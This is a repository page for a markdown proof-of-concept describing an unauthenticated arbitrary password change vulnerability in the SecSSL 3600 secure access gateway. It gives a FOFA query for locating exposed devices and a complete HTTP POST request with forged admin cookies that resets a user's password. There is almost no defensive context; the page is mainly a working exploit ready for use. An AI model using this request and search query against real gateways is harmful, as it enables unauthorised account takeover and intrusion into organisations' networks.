admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/某神SecSSL3600安全接入网关系统任意密码修改漏洞.md
wy876 7d72f96815 7.17更新漏洞
2024-07-17 13:07:11 +08:00

22 lines
616 B
Markdown
Raw Permalink Blame History

## 某神SecSSL3600安全接入网关系统任意密码修改漏洞
网神 SecSSL 3600安全接入网关系统 存在未授权访问漏洞,攻击者通过漏洞可以获取用户列表,并修改用户账号密码
## fofa
```
app="安全接入网关SecSSLVPN"
```
## poc
```yaml
POST /changepass.php?type=2 HTTP/1.1
host:
Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}
old_pass=&password=Test123!@&repassword=Test123!@
```
![image-20240714234418619](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407142344689.png)
Reference in New Issue View Git Blame Copy Permalink